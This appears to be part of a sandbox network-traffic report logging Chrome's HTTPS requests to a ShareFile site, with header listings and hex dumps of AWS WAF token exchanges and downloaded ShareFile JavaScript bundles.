                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC1576INData Raw: 75 73 65 64 4e 53 3a 69 7d 7d 7d 2c 7b 6b 65 79 3a 22 69 73 56 61 6c 69 64 4c 6f 6f 6b 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 28 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 4e 75 6c 6c 26 26 6e 75 6c 6c 3d 3d 3d 65 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 45 6d 70 74 79 53 74 72 69 6e 67 26 26 22 22 3d 3d 3d 65 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 52 65 73 6f 75 72 63 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                      Data Ascii: usedNS:i}}},{key:"isValidLookup",value:function(e){return!(e===undefined||!this.options.returnNull&&null===e||!this.options.returnEmptyString&&""===e)}},{key:"getResource",value:function(e,t,r){var n=arguments.length>3&&arguments[3]!==undefined?arguments[
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 67 74 68 26 26 28 72 5b 31 5d 3d 72 5b 31 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 2c 22 73 67 6e 22 21 3d 3d 72 5b 30 5d 26 26 32 3d 3d 3d 72 5b 32 5d 2e 6c 65 6e 67 74 68 26 26 28 72 5b 32 5d 3d 72 5b 32 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 2c 74 2e 69 6e 64 65 78 4f 66 28 72 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3e 2d 31 26 26 28 72 5b 31 5d 3d 72 72 28 72 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 2c 74 2e 69 6e 64 65 78 4f 66 28 72 5b 32 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3e 2d 31 26 26 28 72 5b 32 5d 3d 72 72 28 72 5b 32 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 29 2c 72 2e 6a 6f 69 6e 28 22 2d 22 29 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6c 65 61 6e 43
                                                                                                                                                                                                                      Data Ascii: gth&&(r[1]=r[1].toUpperCase()),"sgn"!==r[0]&&2===r[2].length&&(r[2]=r[2].toUpperCase()),t.indexOf(r[1].toLowerCase())>-1&&(r[1]=rr(r[1].toLowerCase())),t.indexOf(r[2].toLowerCase())>-1&&(r[2]=rr(r[2].toLowerCase()))),r.join("-")}return this.options.cleanC


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      37192.168.2.174975718.239.18.504437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC653OUTPOST /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Content-Length: 1267
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC1267OUTData Raw: 7b 22 65 78 69 73 74 69 6e 67 5f 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 67 69 43 49 30 47 45 46 41 51 41 41 3a 2b 53 4e 68 37 6d 76 51 77 6c 50 2f 61 37 62 4f 72 6b 42 4f 30 4c 42 58 69 57 41 47 74 45 50 39 64 2b 42 6c 57 64 75 70 46 67 52 42 7a 77 71 59 35 56 32 74 66 42 66 75 64 42 76 2f 7a 59 57 38 39 34 5a 77 33 50 70 4b 48 71 4c 68 52 49 52 73 62 47 79 4f 79 30 64 38 76 4d 64 4c 51 47 73 38 4e 30 77 2f 72 66 36 75 79 49 54 67 41 64 53 43 4a 4f 67 36 73 37 4e 67 68 30 36 52 55 2b 61 71 59 57 4d 50 67 67 55 43 4f 36 33 45 34 57 66 6e 6c 5a 73 4c 33 56 6d 61 47 49 69 72 6d 69 64 37 69 69 6f 36 75 59 34 6b 33 77 43 62 55 4a 67 4a 54 75 63 78 75 58
                                                                                                                                                                                                                      Data Ascii: {"existing_token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAgiCI0GEFAQAA:+SNh7mvQwlP/a7bOrkBO0LBXiWAGtEP9d+BlWdupFgRBzwqY5V2tfBfudBv/zYW894Zw3PpKHqLhRIRsbGyOy0d8vMdLQGs8N0w/rf6uyITgAdSCJOg6s7Ngh06RU+aqYWMPggUCO63E4WfnlZsL3VmaGIirmid7iio6uY4k3wCbUJgJTucxuX
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 860
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:08 GMT
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a8-433e3a1b280b72e70c44544e
                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                      cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 be95b2ba3a5805485c26e84ad1dd7a2e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: zbSqEd2_vfhHrLM6p3pDWtdnrIXymqK9S1kRQv-8K0i2XWecC9EQlg==
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC860INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 64 4d 79 49 78 37 76 48 41 41 41 41 3a 38 34 5a 44 6b 69 51 77 64 4e 50 46 4e 69 50 2f 67 6f 63 76 50 59 43 54 68 76 55 4a 56 77 57 41 68 46 55 64 51 39 65 33 30 53 36 37 58 42 72 62 64 35 50 38 45 66 38 56 4b 44 72 39 38 58 42 55 78 6f 79 68 64 69 45 75 2b 38 73 52 71 79 53 2f 43 59 53 30 4f 50 58 78 41 45 35 36 76 52 30 63 6b 61 50 6c 31 44 63 64 34 33 4a 6e 6a 31 4d 41 72 78 41 4f 6b 49 6e 49 44 4f 35 43 73 43 4d 4f 36 6b 71 6a 75 45 42 74 66 31 5a 53 65 4c 62 4f 47 74 4b 63 77 4b 35 73 7a 6c 38 6d 66 4f 41 71 67 64 5a 69 59 4d 54 62 54 69 44 6f 2f 76 77 36 74 74 41 4e 68 6d 5a 32 49 50 42 42 72 5a 6e
                                                                                                                                                                                                                      Data Ascii: {"token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAdMyIx7vHAAAA:84ZDkiQwdNPFNiP/gocvPYCThvUJVwWAhFUdQ9e30S67XBrbd5P8Ef8VKDr98XBUxoyhdiEu+8sRqyS/CYS0OPXxAE56vR0ckaPl1Dcd43Jnj1MArxAOkInIDO5CsCMO6kqjuEBtf1ZSeLbOGtKcwK5szl8mfOAqgdZiYMTbTiDo/vw6ttANhmZ2IPBBrZn


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      38192.168.2.174975618.245.175.1004437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC407OUTGET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC448INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:08 GMT
                                                                                                                                                                                                                      allow: POST
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a8-7fa7123d6a1498bd6c3be428
                                                                                                                                                                                                                      X-Cache: Error from cloudfront
                                                                                                                                                                                                                      Via: 1.1 bc7f3dfaddaebf9f4730d8a430bb7590.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: CDG55-P1
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: PuG0GKEwRoLWQQyCMOqLFDlM2h1vhSgpHEfVCsoT4gM7dLCdxbbIow==


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      39192.168.2.174975813.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC611OUTGET /sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 113286
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 00:59:01 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:09 GMT
                                                                                                                                                                                                                      ETag: "2c38c5498d5fb32ec1f06835620a80b8"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 0f34c0d3b0e50b8875bcbb7d41684a58.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: yAyZw-ROjfyjry8hA92tZFBu8lzhLwTM5H52DRwoVrHmy6qFkSeSlg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 61 75 64 69 74 63 6f 6c 6c 65 63 74 6f 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 41 70 70 3d 65 2e 41 70 70 2c 72 2e 42 75 74 74 6f 6e 3d 65 2e 42 75 74 74 6f 6e 2c 72 2e 44 61 74 65 50 69
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{})System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.App=e.App,r.Button=e.Button,r.DatePi
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 66 28 65 29 7b 69 66 28 65 5b 74 5d 29 72 65 74 75 72 6e 20 65 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 72 29 2c 6f 3d 65 2c 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 69 29 7b 69 66 28 21 6f 29 72 65 74 75 72 6e 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 5b 6e 5b 69 5d 5d 26 26 69 2b 31 3c 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6f 5b 6e 5b 69 5d 5d 29 7b 66 6f 72 28 76 61 72 20 61 3d 32 2c 73 3d 6e 2e 73 6c 69 63 65 28 69 2c 69 2b 61 29 2e 6a 6f 69 6e 28 72 29 2c 63 3d 6f 5b 73 5d 3b 76 6f 69 64 20 30 3d 3d 3d 63 26 26 6e 2e 6c 65 6e 67 74 68 3e 69 2b 61 3b 29 61 2b 2b 2c 63 3d 6f 5b 73 3d 6e 2e 73 6c 69 63 65 28 69 2c 69 2b 61 29 2e 6a 6f 69 6e 28 72 29
                                                                                                                                                                                                                      Data Ascii: f(e){if(e[t])return e[t];for(var n=t.split(r),o=e,i=0;i<n.length;++i){if(!o)return;if("string"==typeof o[n[i]]&&i+1<n.length)return;if(void 0===o[n[i]]){for(var a=2,s=n.slice(i,i+a).join(r),c=o[s];void 0===c&&n.length>i+a;)a++,c=o[s=n.slice(i,i+a).join(r)
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 6f 6e 73 2e 6c 6f 61 64 26 26 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 67 65 74 53 63 72 69 70 74 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 2c 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 29 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 69 28 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 65 29 29 2c 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 26 26 69 28 72 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67
                                                                                                                                                                                                                      Data Ascii: ons.load&&"currentOnly"!==this.options.load&&i(this.getScriptPartFromCode(e)),"currentOnly"!==this.options.load&&i(this.getLanguagePartFromCode(e))):"string"==typeof e&&i(this.formatLanguageCode(e)),n.forEach((function(e){o.indexOf(e)<0&&i(r.formatLanguag
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 5b 74 5d 26 26 28 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 5b 74 5d 2c 65 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 2d 2d 29 7d 28 72 2c 65 29 2c 74 26 26 72 2e 65 72 72 6f 72 73 2e 70 75 73 68 28 74 29 2c 30 21 3d 3d 72 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 7c 7c 72 2e 64 6f 6e 65 7c 7c 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 2e 6c 6f 61 64 65 64 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 5b 65 5d 7c 7c 28 61 5b 65 5d 3d 7b 7d 29 3b 76 61 72 20 74 3d 72 2e 6c 6f 61 64 65 64 5b 65 5d 3b 74 2e 6c 65 6e 67 74 68 26 26 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 6f 69 64 20 30 3d 3d 3d 61 5b 65 5d 5b 74 5d 26 26 28 61 5b 65 5d 5b 74 5d 3d 21 30 29 7d 29 29 7d 29 29 2c 72 2e 64 6f 6e 65 3d 21 30
                                                                                                                                                                                                                      Data Ascii: [t]&&(delete e.pending[t],e.pendingCount--)}(r,e),t&&r.errors.push(t),0!==r.pendingCount||r.done||(Object.keys(r.loaded).forEach((function(e){a[e]||(a[e]={});var t=r.loaded[e];t.length&&t.forEach((function(t){void 0===a[e][t]&&(a[e][t]=!0)}))})),r.done=!0
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 77 20 67 65 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 29 7d 29 29 3b 76 61 72 20 76 65 3d 67 65 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 29 3b 76 65 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 3d 67 65 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 3b 76 65 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 2c 76 65 2e 69 6e 69 74 2c 76 65 2e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 2c 76 65 2e 72 65 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 2c 76 65 2e 75 73 65 2c 76 65 2e 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65
                                                                                                                                                                                                                      Data Ascii: w ge(arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},arguments.length>1?arguments[1]:void 0)}));var ve=ge.createInstance();ve.createInstance=ge.createInstance;ve.createInstance,ve.init,ve.loadResources,ve.reloadResources,ve.use,ve.changeLanguage
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 76 61 72 20 72 3d 65 5b 75 5d 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 2e 63 61 6c 6c 28 65 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6e 65 78 74 29 72 65 74 75 72 6e 20 65 3b 69 66 28 21 69 73 4e 61 4e 28 65 2e 6c 65 6e 67 74 68 29 29 7b 76 61 72 20 6f 3d 2d 31 2c 69 3d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 66 6f 72 28 3b 2b 2b 6f 3c 65 2e 6c 65 6e 67 74 68 3b 29 69 66 28 61 2e 63 61 6c 6c 28 65 2c 6f 29 29 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 65 5b 6f 5d 2c 72 2e 64 6f 6e 65 3d 21 31 2c 72 3b 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 74 2c 72 2e 64 6f 6e 65 3d 21 30 2c 72 7d 3b 72 65 74 75 72 6e 20 69 2e 6e 65 78 74 3d 69 7d 7d 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 6e 28 65 29 2b 22
                                                                                                                                                                                                                      Data Ascii: var r=e[u];if(r)return r.call(e);if("function"==typeof e.next)return e;if(!isNaN(e.length)){var o=-1,i=function r(){for(;++o<e.length;)if(a.call(e,o))return r.value=e[o],r.done=!1,r;return r.value=t,r.done=!0,r};return i.next=i}}throw new TypeError(n(e)+"
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC15572INData Raw: 22 23 30 30 63 65 64 31 22 2c 64 61 72 6b 76 69 6f 6c 65 74 3a 22 23 39 34 30 30 64 33 22 2c 64 65 65 70 70 69 6e 6b 3a 22 23 66 66 31 34 39 33 22 2c 64 65 65 70 73 6b 79 62 6c 75 65 3a 22 23 30 30 62 66 66 66 22 2c 64 69 6d 67 72 61 79 3a 22 23 36 39 36 39 36 39 22 2c 64 69 6d 67 72 65 79 3a 22 23 36 39 36 39 36 39 22 2c 64 6f 64 67 65 72 62 6c 75 65 3a 22 23 31 65 39 30 66 66 22 2c 66 69 72 65 62 72 69 63 6b 3a 22 23 62 32 32 32 32 32 22 2c 66 6c 6f 72 61 6c 77 68 69 74 65 3a 22 23 66 66 66 61 66 30 22 2c 66 6f 72 65 73 74 67 72 65 65 6e 3a 22 23 32 32 38 62 32 32 22 2c 66 75 63 68 73 69 61 3a 22 23 66 66 30 30 66 66 22 2c 67 61 69 6e 73 62 6f 72 6f 3a 22 23 64 63 64 63 64 63 22 2c 67 68 6f 73 74 77 68 69 74 65 3a 22 23 66 38 66 38 66 66 22 2c 67 6f 6c
                                                                                                                                                                                                                      Data Ascii: "#00ced1",darkviolet:"#9400d3",deeppink:"#ff1493",deepskyblue:"#00bfff",dimgray:"#696969",dimgrey:"#696969",dodgerblue:"#1e90ff",firebrick:"#b22222",floralwhite:"#fffaf0",forestgreen:"#228b22",fuchsia:"#ff00ff",gainsboro:"#dcdcdc",ghostwhite:"#f8f8ff",gol


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      40192.168.2.174975913.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC418OUTGET /sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 775350
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 29 Oct 2024 06:47:49 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:08 GMT
                                                                                                                                                                                                                      ETag: "67dd564568419099f49ebded11913e6c"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 ba5b5e2e7fd98c4a472633bc4c1d4480.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 7qLvQD2yx6xGTkLaKdujOkMLgoFRLQV3YYXDJeIGVmuHNR-8bCjaaw==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC15862INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 65 73 69 67 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevesignpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},i={},o={},r={},a={},s={},l={};return Object.defineProperty
